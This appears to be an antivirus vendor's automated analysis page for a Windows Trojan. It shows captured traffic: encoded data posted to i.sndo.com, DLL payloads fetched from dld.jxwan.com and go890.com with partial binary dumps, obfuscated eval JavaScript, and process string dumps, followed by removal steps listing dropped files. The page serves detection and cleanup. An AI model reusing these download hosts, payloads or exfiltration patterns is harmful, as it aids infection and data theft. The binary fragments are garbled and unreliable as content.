....V..).,~....%.7..z./..tW../..&..M...\.l...........s=..F.\...g.....m
.7j.......Q...q.;.F.I.v.....c........cv. W..d.X.......[}M.o_....f..g..
"./...|.D............n.......l.m;......P>..cz......6.d...}.g~...g.e
..p...T......f..D.>].....,..'.-.......S3.?.........n.;....p.w.v.=..
.....|.S....'h.K..s;..%.6}<.s.f.........m. ....V...wol%y....j._.=.&
lt;Y....m.....Y....Bf.<...p.m.{6.9..N.1 Ry.A../.MTH..Y.fu.....^\a..
j..U.}}Z.....ux.w...........=.wi....O....u../.......... .e..../.....R.
._.2......7...{..`0....^J..9^........0....._..b.....L. Cn........:....
L....Y.....E.J....k.}vG.........L..|..\.-U..9Z....=.w.K...S..i..3..k..
...|.)....d...`.................%..dK..U~9....G.H.l<.s.^........m..
.e../...r...,.].o_.i'..Y."H..]5i^........aK...7...zNF........~.l......
V_6./...........?....b...y......~=6............o........f..s..[...r{..
..)..;.X}....v..o./..H.......}....{..Of../..Lz../...g.t3\...6...WQ....
...7[.......w....v.P')..KQ..g."~..%..9OZ...........lD.Ciw..&......>
.._.[A.J.m.F-.y....Xw.CZ_.v....o.....&].>.........7.B7.....!.BJ....
.x..qb...7...w.....<..........^]fFe.b.......Y..Fj.....,_m.....X..My
}...T.w....|...5..O..3m....-g..fv.z79=_,.G.2=s.[Tx..'.....$=.R...?>
..@o..#.2..<..........\.6{.F.ki......,....."y.*..W...Q.. 6e........
..|...D.`...1:~kv[T4.|..p2....-J..*.....K'x{z..s(..&....0.....X.I.z..-
..i./......e....hw...... Kh{...1.s&.....% .,.k....N...M.e.#.....N.
<<< skipped >>>


GET /s.json?g=MTUwNDU5MjQ4MDQ3NzAwMO9UrQUPZeovcXd7lISxliFM*I2t9GMztLzd-4Ss2V4S3GgKOk*3LI4Oyjm-VUvqyyFwAK9z4Z4s1uy*4kWckxeiZwMqDefR6BZFaQ-h6dpY4cbddl2-6ecos02yEpW6g3XH1RakoVsIZKoU6dEw5M*EmOFPF8d4dIxESMPX7f9n7L7fioXfvnh*xr8IXI31xn4coZKX2PBJAHwp*YF-0TA-HDyeBaK35xay6L-eYOcu HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: deflate,sdch
Connection: Close
Accept-Charset: GBK,utf-8
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Host: client.sndo.com


HTTP/1.1 200 OK
Server: nginx/1.12.0
Date: Tue, 05 Sep 2017 03:21:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.6.30
298..MWY3MGU5YmY4ZTVlMTJlM-1EQUmfwC22yoiyGOQZH*bkPGdpJFXbzm4uEz38ZCMsm
NSOAy4C8shc4SQ5Ha909kx28LWhNeMxTNChqr9MxjgHO6tU3soJ3s6Sj7q7Au6TzyJZEBa
j*7BjEw-EJNeNARQ51W5IZ61PpG5A*jCWIRdV8u6sk2cOavfDLMzjIJe4u0SLESE1ouB3c
R6-0ANToqTls-eq6hvjjqLE0Kslch9XRyA-w03CDJ2whU5k6XPUdJ8lw6W-Q*HXzZV1wsm
1sJ4NFyymBBPbv1WN*ab6TRcmHkbqK7n4bhXc4uw4aUlaNncuNE77bPHrCSANtHAayC9yU
j2O6*-EX-7dFGhphBI4KRvOjdhiMU3Te6NNlYx7IUpFtRmndZheXNIjrdmSalXFz4XqIAc
DMP7bakbUQA6rjlPPhM-LdL5Lqff*Uwjh7RI6noE9fYFM1laiC32Em-KJ*ZC1ILHUbjneJ
uwiMNrjR8ndtQPdTYLL7sQsCocWw6Hrv8OVa7Jw*qJw7ez7QVscOs7DLEQpE8z7Tc5nVg7
WcTBgwpIBDBlHczUZc64V7OYNS3ZNOB90D3omKzIWlUk7AbibIez3VUKcA-0cKdmhjfNct
USBjzjYEdLtDe-JYJMbzKWsInltVMR85iY*4A==..0..



GET / HTTP/1.1
Host: ip.dnsexit.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200 OK
Date: Tue, 05 Sep 2017 03:21:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 17
Connection: close
Content-Type: text/html; charset=UTF-8
 .194.242.96.218 ..



GET /ic.asp HTTP/1.1
Host: 1212.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 500 Server Error
Connection: close
Date: Tue, 05 Sep 2017 03:21:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Content-Length: 1266
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.or
g/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>.....
.......</TITLE>..<META HTTP-EQUIV="Content-Type" Content="tex
t/html; charset=GB2312">..<STYLE type="text/css">..  BODY { f
ont: 9pt/12pt .... }..  H1 { font: 12pt/15pt .... }..  H2 { font: 9pt/
12pt .... }..  A:link { color: red }..  A:visited { color: maroon }..&
lt;/STYLE>..</HEAD><BODY><TABLE width=500 border=0 c
ellspacing=10><TR><TD>..<h1>............</h1&g
t;................................................<hr>..<p>
;................</p>..<ul>..<li>....<a href="jav
ascript:location.reload()">....</a>..................</li&
gt;..<li>.............................................. URL ....
..............</li>..</ul>..<h2>HTTP .... 500.13 - .
...........Web ............<br>Internet ........ (IIS)</h2>
;..<hr>..<p>..............................</p>..<
ul>..<li>.... <a href="hXXp://go.microsoft.com/fwlink/?lin
kid=8180">Microsoft ............</a>..........“HTTP&rdq
uo;..“500”........</li>..<li>....“IIS ..
..”...... IIS ...... (inetmgr) ........................“..
........ Web ............”..“......................”
..“..................”........</li>..</ul>..&l
t;/TD></TR></TABLE></BODY></HTML>....
<<< skipped >>>


POST /putdata?type=2 HTTP/1.1
Content-Type: application/json;charset=utf-8
Content-Length: 1752
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Host: i.sndo.com
Connection: Close

Aq/8JSut/83iY/kc871DLOdz8Cw/b1Oup5usm9/NJOyaJwEGCdXUk3/0Ck6BYmTBoKsV2 SwHpXnoc/VomMjpGQwE aCM6qQPkrW4qrPX79PgaCy0aSLYrClupy6s8Fr2TSCPXhSp3GKSXeeYI1EM5CztmUiN7sPlyID3DDf5BzacJZkOlcNS6X86Tht3fyLf0pj1fjpdyTz//rS47xMopZFwBWukyukQ3DbhECC53/u3vvs36Pncb/hOxUMg7jvYe zyJvKyMhpAUubQt4jMEPHkEJqnhz8z63HWpgsjswCB8Hz0UlCLEzhuLbAeHLKIct3r8Po1g3sP fyfc7pY34PPlMTY8vuxcb/gPE50p6eHa3UPqpgjvuD3o FBrn09h8kJC1tCQYy/eGHYhnTQK/iTbvZP5ov2xNAlDKjgIR05gddRdEn0Mds7mIJZ68UA9gr7ph x2ANYAAOnIHvn0lK9 A6GxODTmb1vADH5/n84qmrW I ctKd94nsFJtsuGqtioEwrILQYHTYsD1u8GjmpaQlSZLBciC5698DJH7INS8rPmWVgYOhKXm2gdp2Cwqc1ZEiRUzgobz1yxFIVHOpZ/pQx2GB/wgAFOpCWb/WYg5ECStRhRoAVUoWz3csAYmFU42IAbi2vpWSwFWcnawTwbXqsLikLyNsa0EztmzORjSQ9VXCVU3G0L3dGe8xTCsfevPEx EbR6ppVpuqYeoP1zD2ic5z1d/DPtrWHw9/MfSl9KOgCS8T3YQqoTld9oqKeOtwwet0R6vJT69Xpd2onZxIN5UknLDLD9wgW48yx/PUCHmu3K/k4pZbBLC58qpZmsal7YpSHYEz3ppUDqC3vNP8UrIjajP/VrZJfWsKyEzjmL8TrCqmH3C6xuLk2u6pGd8u5H0vX4e7BoSXKilp5RCNHbIFOsvuBUm7ZQYH0tnzi9xSAwImUJPFhuLgzGupZ0i WaGQsMZHYFVIAaZihoK1LsAlCy65SunPk5a8tOycAiBbe2V1Y9MwzOgcZq1fD6sTCos45fxumeFuRM l fvpaCjp3WCDBxqesQN2AVFNrVP2ahNGaVx/iVMYP1Jmy8VDXGnu68KD3rdsmJthFaO6bVvEGMLBADqaGQkSk1EUXRb/r3PobKOQACQRX qycYbeNhhkvXnGY1OzCMEId1X2Iej1D/SEmfrqIuChsLaONscLxqRT7jlMuAmiITre/F0RABT0dfg4KzwgRyDf3MXl8YZY8T/E6fe6T4S92pZa6WR8DXKHJM3f
HTTP/1.1 200 OK
Server: nginx/1.12.0
Date: Tue, 05 Sep 2017 03:21:23 GMT
Transfer-Encoding: chunked
Connection: close
0..



GET / HTTP/1.1
Host: VVV.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 10:22:22 GMT
Content-Length: 19152
Content-Type: text/html
Content-Location: hXXp://VVV.ip138.com/index.htm
Last-Modified: Mon, 21 Aug 2017 04:05:37 GMT
Accept-Ranges: bytes
ETag: "a47bb4be321ad31:10bb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 61129
X-Via: 1.1 PSbjwjBGP2vu136:3 (Cdn Cache Server V2.0), 1.1 dxin178:6 (Cdn Cache Server V2.0), 1.1 db77:5 (Cdn Cache Server V2.0)
Connection: keep-alive
<!DOCTYPE html>..<html>...<head>....<meta charset
="gb2312">....<meta name="mobile-agent" content="format=html5; u
rl=hXXp://m.ip138.com/">....<title>IP........--..............
.... | ............ | ............ | ........................</titl
e>....<meta name="keywords" content="ip,IP....,IP........,ip138"
/>....<meta name="description" content="ip,IP....,IP........,ip1
38"/>....<script type="text/javascript">.....<!--......if(
window.top!=window.self)window.top.location.href='hXXp://VVV.ip138.com
/';.....//-->....</script>....<style type="text/css">..
...html{color:#000;background:#FFF}body,div,dl,dt,dd,ul,ol,li,h1,h3,h3
,h4,h5,h6,pre,code,form,fieldset,legend,input,textarea,p,blockquote,th
,td{margin:0;padding:0}table{border-collapse:collapse;border-spacing:0
}fieldset,img{border:0}address,caption,cite,code,dfn,em,strong,th,var{
font-style:normal;font-weight:normal}ol,ul{list-style:none}caption,th{
text-align:left}h1,h3,h3,h4,h5,h6{font-size:100%;}q:before,q:after{con
tent:''}abbr,acronym{border:0;font-variant:normal}sup{vertical-align:t
ext-top}sub{vertical-align:text-bottom}input,textarea,select{font-fami
ly:inherit;font-size:inherit;font-weight:inherit;*font-size:100%}legen
d{color:#000}.....html{height:100%;}.....body{height:100%;font-size:14
px;font-family: Arial,Helvetica,"Microsoft Yahei";color:#333;}.....tab
le{table-layout:fixed;border-collapse: collapse;border-spacing: 0;marg
in: 0 auto;}.....input,button{font-family: Tahoma,Arial, Helvetica
<<< skipped >>>


HEAD /d2/wblm.dll HTTP/1.1
Host: dld.jxwan.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 23:26:47 GMT
Server: kangle/2.9.6
Last-Modified: Fri, 18 Aug 2017 03:03:47 GMT
Content-Type: application/octet-stream
Content-Length: 489984
Age: 1
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive
....


GET /d2/wblm.dll HTTP/1.1


Host: dld.jxwan.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 23:26:47 GMT
Server: kangle/2.9.6
Last-Modified: Fri, 18 Aug 2017 03:03:47 GMT
Content-Type: application/octet-stream
Content-Length: 489984
Age: 1
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@................................... .........
..!..L.!This program cannot be run in DOS mode....$.......6.s.r...r...
r.......w...$...{...r...[.......z...!...p.....@.t.......b.......v.....
..w.......p.......w...r...........A.......s...Richr...................
........PE..L...$U.Y...........!.................0....... ............
...................`...............................................@..
.............................?........................................
...............................................text...................
............`....rdata...0... ......................@....data........P
......................@....rsrc...............................@....rel
oc... ...........V..............@....aspack.. ...0.......f............
..`....adata.......P.......z..............@...........................
......................................................................
......................................................................
............................................(..2....3...$....0.BP.AcAl
d..$H!=. .1..BA.T..U...5....l....u........<.y[k.e.j.F..T..`..l...l.
!.a3.3!<.^.n.....?B............VB.. .\.9.`.L........^Ajr.W. ^@.NH&g
t;..n...^@.s$}9.v.A.......{....~}........O9..~?=.=....._.X.!.#.;../..\
w...[....u,\....o@.....wE.....ZQ../..*...`..G.J...1.R.L...J.....H..]..
................X...............H"`.....&{.;.\../..5.)....D..R...#.[..
...b..U;Y.B...R.@`.......4..\...Z.e.(......PlF..K..j!K,...t%..ax..}...
..H;..a.h..Vj....k....JL...Z..o."r...3I..}.R .......VB.. .]...1.p7
<<< skipped >>>


GET /d2/CDClient.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 22:50:24 GMT
Server: kangle/2.9.6
Last-Modified: Mon, 04 Sep 2017 09:43:48 GMT
Content-Type: application/octet-stream
Content-Length: 963072
Age: 1
X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive
DUP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
.....f..........(u............@................................./p....
..................................<...R.......m....................
......................................................................
.................CODE....................PEC2^O...... ....rsrc....0...
....".................. ....reloc..............................@......
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
................................................$..b.. .........c....X
.........b..._.....J>b.d.I.....i5.R......-.X.,So.....Wp.eAbk......7
i.....8x......j...o$.f....e.Xa...V....b.C.n...9H..TC.J-......].L .b|C.
*{?..@...a..w..Q.s...."..\...3KO.w.....V.....^.#b.l......<.q.C<.
......].6..t..E..s.oT.f0...vn.=.l.D.....6\@..Cg.B.._.I5O.......K......
....Gi..A>.L..j3..{..=.....Q.fG.{...?.A.G.q...Q............9..\..R.
......O.....X}l.Yf.......c.|#..'.C<..tNk..qx..@=....EW._..v....(^..
....x..".=o;......?.4....(.$...t..8.R*#....].Q[a....IAK...y.M..c.c
<<< skipped >>>


GET / HTTP/1.1
Host: VVV.ip.cn
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200 OK
Content-Type: text/html
Content-Length:   95
Pragma: no-cache
Cache-control: no-store
<html><body><script>var en="",fn="",co,ao=new Array(
),bo;function cn(dn){for(co=0;co<bo.length;co  )ao[co]=bo.charCodeA
t(co);co="for(co=49;;co--){if(co<4)break;ao[co]=((((ao[co] 42)&0xff
)<<7)&0xff)|(((ao[co] 42)&0xff)>>1);ao[co]=(-ao[co])&0xff;
}";eval(co);co=49;do{ao[co]=(((ao[co] 220)&0xff)>>5)|((((ao[co] 
220)&0xff)<<3)&0xff);ao[co]=ao[co]^112;}while(--co>=3);for(co
=49;co>=2;){ao[co]=(((~ao[co])&0xff) 250)&0xff;ao[co]=(-ao[co])&0xf
f;co--;}bo="";for(co=1;co<ao.length-1;co  )if(co%6)bo =String.fromC
harCode(ao[co]^dn);eval("co=eval");co(bo);}bo="\xdc\x06\x111\xf0\xb7\x
ee\xad\x85\xb7\xed0:u\x070u\xc6\x05\x80\xc7\xc3v,\xfc\xed-\xf77B\x12\x
f0\xf0p\xf0\xad\x03\x80\xc6wu\x06\xbc\x80\xbb\xac0\xf6\x97wSX\xd3";cn(
113);</script><script>var u=2;for(;u==1;u  );</script&g
t;<br><br><br><center><h3><p>‹
BF;问本页面,您的浏&#x
89C8;器需要支持JavaScript</p></
h3></center></body></html>..

The Trojan connects to the servers at the folowing location(s):

SearchProtocolHost.exe_3992:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610

SearchFilterHost.exe_3640:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610

svchost.exe_1640:

.text
`.data
.rsrc
@.reloc
msvcrt.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
KERNEL32.dll
NTDLL.DLL
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
RPCRT4.dll
ole32.dll
ntdll.dll
_amsg_exit
RegCloseKey
RegOpenKeyExW
GetProcessHeap
svchost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Services.SvcHost"
<description>Host Process for Windows Services</description>
<requestedExecutionLevel
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
\PIPE\
Host Process for Windows Services
6.1.7600.16385 (win7_rtm.090713-1255)
svchost.exe
Windows
Operating System
6.1.7600.16385


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:3676
    adca3c78dafc4406e4d0862872e8236.exe:260

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Roaming\hUOtTh\adca3c78dafc4406e4d0862872e8236.exe (7948 bytes)
    C:\Windows\LqYWOJJH.dll (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\r[1].json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\r[1].json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\r[2].json (1 bytes)
    C:\Windows\CLOG.txt (87 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\r[1].json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
    C:\Windows\PHTQYMp\WVqSMf.dll (16404 bytes)
    C:\Windows\PHTQYMp\GMpkepQXi.dll (12 bytes)
    C:\Windows\ovhlpnij.dll (13 bytes)
    C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (276 bytes)
    C:\Windows\PHTQYMp\QPofTRsG.dll (992 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (67 bytes)
    C:\Windows\System32\1428b5\CDClient_EX.sys (117 bytes)
    C:\Windows\PHTQYMp\oBIxFFT.tmp (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
    C:\Windows\PHTQYMp\LNYxeOwQr.dll (264 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Average: 1 (2 votes)


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now